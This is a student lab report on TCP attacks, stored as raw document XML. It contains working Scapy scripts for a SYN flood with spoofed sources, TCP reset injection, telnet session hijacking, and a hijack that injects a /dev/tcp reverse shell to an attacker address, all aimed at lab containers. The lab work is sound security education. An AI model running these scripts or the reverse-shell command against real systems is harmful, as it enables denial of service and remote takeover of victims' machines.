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3DA07" w14:textId="38BB2CEE" w:rsidR="003C08A4" w:rsidRPr="006E5C69" w:rsidRDefault="003C08A4" w:rsidP="003243CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>LAB 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7303EB92" w14:textId="5DCEE2DB" w:rsidR="006F0D6D" w:rsidRDefault="006F0D6D" w:rsidP="006F0D6D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="707" w:after="354" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0D6D">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Task 1: SYN Flooding Attack</w:t>
      </w:r>
      <w:r w:rsidR="00730335">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E1D295" w14:textId="67A69CE8" w:rsidR="00730335" w:rsidRPr="006F0D6D" w:rsidRDefault="00730335" w:rsidP="006F0D6D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="707" w:after="354" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The server was overwhelmed with number of SYN_RECV </w:t>
      </w:r>
      <w:r w:rsidR="00EE6C56">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:eastAsia="Times New Roman" w:hAnsi="Abadi" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">packets sent through the TCP attacker. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A36B50E" w14:textId="3A4D18AF" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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root@2fb46a9c64bb:/# sysctl net.ipv4.tcp_max_syn_backlog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCCBE7" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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net.ipv4.tcp_max_syn_backlog = 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB74A63" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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root@2fb46a9c64bb:/# sysctl -a | grep syncookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ADA058" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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net.ipv4.tcp_syncookies = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED047F" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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root@2fb46a9c64bb:/# sysctl -w net.ipv4.tcp_syncookies=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD23C47" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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net.ipv4.tcp_syncookies = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5F35D9" w14:textId="77777777" w:rsidR="00D202ED" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED" w:rsidP="00D202ED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root@2fb46a9c64bb:/# sysctl -w net.ipv4.tcp_syncookies=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EB5ADE" w14:textId="542D74EE" w:rsidR="00BC31D4" w:rsidRPr="006E5C69" w:rsidRDefault="00D202ED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net.ipv4.tcp_syncookies = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEBB722" w14:textId="372BA119" w:rsidR="00A44199" w:rsidRPr="006E5C69" w:rsidRDefault="00A44199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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD017A6" wp14:editId="3DFB81DB">
            <wp:extent cx="5731510" cy="3861435"/>
            <wp:effectExtent l="0" t="0" r="254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418D" w14:textId="5DFC2ED6" w:rsidR="003C08A4" w:rsidRPr="006E5C69" w:rsidRDefault="00BC31D4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Task 1.1: Launching the Attack Using Python</w:t>
      </w:r>
      <w:r w:rsidR="007667D7">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CAE43" w14:textId="70D46049" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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 xml:space="preserve">#!/bin/env python3 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A12BA" w14:textId="77777777" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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 xml:space="preserve">from scapy.all import IP, TCP, send </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4BA9B" w14:textId="77777777" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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lastRenderedPageBreak/>
        <w:t>from ipaddress import IPv4Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3C6CE4" w14:textId="77777777" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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 xml:space="preserve"> from random import getrandbits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360BF5C" w14:textId="7C9599AF" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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ip = IP(dst="</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>") tcp = TCP(dport=</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, flags=</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) pkt = ip/tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEBC64" w14:textId="77777777" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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 xml:space="preserve">while True: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139F670" w14:textId="324F04DB" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B" w:rsidP="0026266B">
      <w:pPr>
        <w:ind w:firstLine="720"/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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C31931" w14:textId="77777777" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B" w:rsidP="0026266B">
      <w:pPr>
        <w:ind w:firstLine="720"/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 xml:space="preserve"> pkt[TCP].sport = getrandbits(16) # source port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E91575" w14:textId="62AA175C" w:rsidR="0026266B" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B" w:rsidP="0026266B">
      <w:pPr>
        <w:ind w:firstLine="720"/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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pkt[TCP].seq = getrandbits(32) # sequence number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAD0D12" w14:textId="70FAFB86" w:rsidR="00DB7DD0" w:rsidRPr="006E5C69" w:rsidRDefault="0026266B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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>send(pkt, verbose = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67902DA0" w14:textId="546F0A5D" w:rsidR="00071C54" w:rsidRPr="006E5C69" w:rsidRDefault="00071C54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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="482A9989" wp14:editId="12F6E574">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="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7211" w14:textId="5B58490F" w:rsidR="00BB6C69" w:rsidRPr="006E5C69" w:rsidRDefault="00BB6C69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Task 1.2</w:t>
      </w:r>
      <w:r w:rsidR="00E40762" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="004B5624" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Launching the attack using C:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D1D2EB" w14:textId="3CA83D36" w:rsidR="00BB6C69" w:rsidRPr="006E5C69" w:rsidRDefault="00BB6C69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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7012966B" wp14:editId="273BD006">
            <wp:extent cx="5731510" cy="344868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21F4" w14:textId="0318CCAE" w:rsidR="00BB6C69" w:rsidRPr="006E5C69" w:rsidRDefault="00D55A51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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="647978B5" wp14:editId="0F94EE5C">
            <wp:extent cx="5731510" cy="3448685"/>
            <wp:effectExtent l="0" t="0" r="254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CEC1" w14:textId="343B3A81" w:rsidR="00BA236F" w:rsidRPr="006E5C69" w:rsidRDefault="00BA236F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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22BF2D7B" wp14:editId="728A06FE">
            <wp:extent cx="5731510" cy="3448685"/>
            <wp:effectExtent l="0" t="0" r="254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46FF" w14:textId="6E949E3D" w:rsidR="00BA236F" w:rsidRPr="006E5C69" w:rsidRDefault="00BA236F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Task 1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378AAB67" w14:textId="21F9F93A" w:rsidR="00E679F7" w:rsidRPr="006E5C69" w:rsidRDefault="008D1703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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDAF56C" wp14:editId="36C03343">
            <wp:extent cx="5731510" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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8226F" w14:textId="483B275F" w:rsidR="00E679F7" w:rsidRPr="006E5C69" w:rsidRDefault="008D1703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Once the SYN cookies counter</w:t>
      </w:r>
      <w:r w:rsidR="00E67AEC" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">measure </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">is enabled, the </w:t>
      </w:r>
      <w:r w:rsidR="00A96F72" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>syn flood attack fails. The queue just shows the established connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79573D62" w14:textId="77777777" w:rsidR="00E679F7" w:rsidRPr="006E5C69" w:rsidRDefault="00E679F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E746B8" w14:textId="77777777" w:rsidR="00E679F7" w:rsidRPr="006E5C69" w:rsidRDefault="00E679F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A07458F" w14:textId="0A399F5C" w:rsidR="00E40762" w:rsidRDefault="00E40762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Task 2: TCP reset attacks on telnet connections</w:t>
      </w:r>
      <w:r w:rsidR="002A27F7">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA33CE6" w14:textId="2CD66F32" w:rsidR="002A27F7" w:rsidRPr="006E5C69" w:rsidRDefault="002A27F7">
      <w:p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>The connection was terminated due to reset packet sent to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE6F94D" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF6CC27" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0902AB18" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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ip = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466A70AA" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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tcp = TCP(sport=23, dport=27865, flags="R", seq=6557896)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C710564" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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pkt = ip/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E8D327" w14:textId="77777777" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AAE72" w14:textId="7CF94286" w:rsidR="0082364E" w:rsidRPr="006E5C69" w:rsidRDefault="0082364E" w:rsidP="0082364E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send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1199DE9F" w14:textId="75635C7D" w:rsidR="00E679F7" w:rsidRPr="006E5C69" w:rsidRDefault="00E679F7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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CC4CCD8" wp14:editId="5BD2164E">
            <wp:extent cx="5731510" cy="344868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2A75" w14:textId="72E97195" w:rsidR="00FE4E70" w:rsidRPr="006E5C69" w:rsidRDefault="00FE4E70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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6689C9F0" wp14:editId="5DA0D014">
            <wp:extent cx="5731510" cy="3860165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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E1C8" w14:textId="77777777" w:rsidR="00485684" w:rsidRPr="006E5C69" w:rsidRDefault="00485684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1B23C5" w14:textId="77777777" w:rsidR="00485684" w:rsidRPr="006E5C69" w:rsidRDefault="00485684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7074FAD9" w14:textId="77777777" w:rsidR="00485684" w:rsidRPr="006E5C69" w:rsidRDefault="00485684">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B75DF7" w14:textId="6E74396E" w:rsidR="00FA1B78" w:rsidRPr="006E5C69" w:rsidRDefault="00FA1B78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Task 3: Session hijacking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC1D61" w14:textId="5AACC083" w:rsidR="007A2CC9" w:rsidRPr="006E5C69" w:rsidRDefault="007A2CC9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The established TCP connection didn’t work after the attack as </w:t>
      </w:r>
      <w:r w:rsidR="006E5C69" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the SEQ and ACK numbers were tampered by session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB58C46" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D35E26" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CF9DDD" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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ip = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE7FAC1" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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tcp = TCP(sport=23564, dport=23, flags="A", seq=12267783, ack=15783672)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8BA54A" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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data = "Session Hijacked"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3150E65E" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A27FDD" w14:textId="77777777" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4814F066" w14:textId="0010015A" w:rsidR="00395FAD" w:rsidRPr="006E5C69" w:rsidRDefault="00395FAD" w:rsidP="00395FAD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send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E6C99" w14:textId="649CD5D9" w:rsidR="00485684" w:rsidRPr="006E5C69" w:rsidRDefault="00485684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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F73E08" wp14:editId="47B3CEF4">
            <wp:extent cx="5731510" cy="3448685"/>
            <wp:effectExtent l="0" t="0" r="254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10E4" w14:textId="216CE54D" w:rsidR="001718B7" w:rsidRPr="006E5C69" w:rsidRDefault="009F78FE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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC5986F" wp14:editId="0B1D4920">
            <wp:extent cx="5731510" cy="3841115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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7377" w14:textId="77777777" w:rsidR="007A2CC9" w:rsidRPr="006E5C69" w:rsidRDefault="007A2CC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CD2F41" w14:textId="27A27F5C" w:rsidR="009F78FE" w:rsidRDefault="009F78FE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 xml:space="preserve">Task 4: </w:t>
      </w:r>
      <w:r w:rsidR="001718B7" w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFCABBD" w14:textId="18495329" w:rsidR="006C17B9" w:rsidRPr="006E5C69" w:rsidRDefault="006C17B9">
      <w:p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The victim system could be accessed from the attacker’s docker through TCP Session hijacking. The command “ </w:t>
      </w:r>
      <w:r w:rsidRPr="006E5C69">
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Abadi" w:hAnsi="Abadi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ was run on victim system through TCP attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D820B5" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B9206" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CDDAF5" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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ip = IP(src="10.9.0.5", dst="10.9.0.6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C559656" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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tcp = TCP(sport=23564, dport=23, flags="A", seq=12267783, ack=15783672)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7536F5" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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data = "\r /bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1 \r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA4D6A" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508B160" w14:textId="77777777" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DF0D8" w14:textId="79898FDB" w:rsidR="004766CA" w:rsidRPr="006E5C69" w:rsidRDefault="004766CA" w:rsidP="004766CA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t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA15536" w14:textId="5F332119" w:rsidR="001718B7" w:rsidRPr="006E5C69" w:rsidRDefault="001718B7">
      <w:pPr>
        <w:rPr>
